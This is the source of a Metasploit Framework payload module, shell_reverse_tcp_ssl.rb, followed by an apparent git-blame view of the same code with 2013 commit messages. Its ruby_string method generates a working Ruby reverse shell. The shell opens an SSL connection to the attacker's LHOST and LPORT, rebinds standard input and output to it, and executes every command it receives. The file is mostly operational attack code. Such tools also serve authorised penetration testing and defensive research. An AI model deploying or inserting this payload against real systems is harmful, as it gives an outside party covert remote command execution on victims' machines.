metasploit-framework/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/payload/ruby'
require 'msf/core/handler/reverse_tcp_ssl'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Ruby
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'        => 'Ruby Command Shell, Reverse TCP SSL',
			'Version'     => '$Revision$',
			'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
			'Author'      => 'RageLtMan',
			'License'     => MSF_LICENSE,
			'Platform'    => 'ruby',
			'Arch'        => ARCH_RUBY,
			'Handler'     => Msf::Handler::ReverseTcpSsl,
			'Session'     => Msf::Sessions::CommandShell,
			'PayloadType' => 'ruby',
			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
		))
	end

	def generate
		rbs = prepends(ruby_string)
		vprint_good rbs
		return rbs
	end

	def ruby_string
		lhost = datastore['LHOST']
		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)

		"require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",#{datastore['LPORT'].to_i})).connect;"+
		"$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + 
		"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"
	end
end
initial module import from SV rev_ssl branch 2013-02-03 19:59:15 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'msf/core/payload/ruby'`
			`require 'msf/core/handler/reverse_tcp_ssl'`
			`require 'msf/base/sessions/command_shell'`
			`require 'msf/base/sessions/command_shell_options'`

			`module Metasploit3`

			`include Msf::Payload::Single`
			`include Msf::Payload::Ruby`
			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Ruby Command Shell, Reverse TCP SSL',`
			`'Version' => '$Revision$',`
			`'Description' => 'Connect back and create a command shell via Ruby, uses SSL',`
			`'Author' => 'RageLtMan',`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'ruby',`
			`'Arch' => ARCH_RUBY,`
			`'Handler' => Msf::Handler::ReverseTcpSsl,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'ruby',`
			`'Payload' => { 'Offsets' => {}, 'Payload' => '' }`
			`))`
			`end`

			`def generate`
			`rbs = prepends(ruby_string)`
			`vprint_good rbs`
			`return rbs`
			`end`

			`def ruby_string`
			`lhost = datastore['LHOST']`
			`lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)`
This allows the ruby payloads to work properly on Windows 2013-02-12 16:55:37 +00:00
Fix a typo and always treat ports as integers: 2013-02-12 16:59:11 +00:00			`"require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",#{datastore['LPORT'].to_i})).connect;"+`
This allows the ruby payloads to work properly on Windows 2013-02-12 16:55:37 +00:00			`"$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{\|l\|l=l.strip;next if l.length==0;" +`
Handle invalid commands gracefully (dont exit) 2013-02-12 19:33:23 +00:00			`"(IO.popen(l,\"rb\"){\|fd\| fd.each_line {\|o\| c.puts(o.strip) }}) rescue nil }"`
initial module import from SV rev_ssl branch 2013-02-03 19:59:15 +00:00			`end`
			`end`